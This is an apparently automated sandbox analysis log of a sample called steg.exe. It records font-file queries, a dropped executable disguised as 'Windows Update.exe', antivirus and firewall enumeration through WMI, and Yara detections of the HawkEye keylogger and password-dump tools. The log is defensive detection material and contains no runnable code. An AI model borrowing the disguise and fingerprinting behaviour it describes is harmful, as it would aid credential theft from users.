                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FEB5AE cpuid 0_2_00FEB5AE
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                Source: Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                                Stealing of Sensitive Information

                                barindex
                                Yara detected HawkEye Keylogger
                                Source: Yara matchFile source: steg.exe, type: SAMPLE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.acb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.b4d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000002.359909884.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.324470514.0000000000915000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.302645603.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: steg.exe PID: 6544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 7000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5876, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                                Yara detected EmailPasswordDump Tool by SecurityXploded
                                Source: Yara matchFile source: steg.exe, type: SAMPLE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.9d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.100d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.11.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.b4d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.acb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.100d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.1.Windows Update.exe.1b377.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.1.Windows Update.exe.9d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.1.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.b4d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.34d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.10.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.34d97c.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.324470514.0000000000915000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000001.280458737.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000003.351328752.0000000007544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: steg.exe PID: 6544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 7000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5876, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                                Yara detected BrowserPasswordDump Tool by SecurityXploded
                                Source: Yara matchFile source: steg.exe, type: SAMPLE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2cb377.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2cb377.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.1b377.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.acb377.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.9.unpack, type: UNPACKEDPE
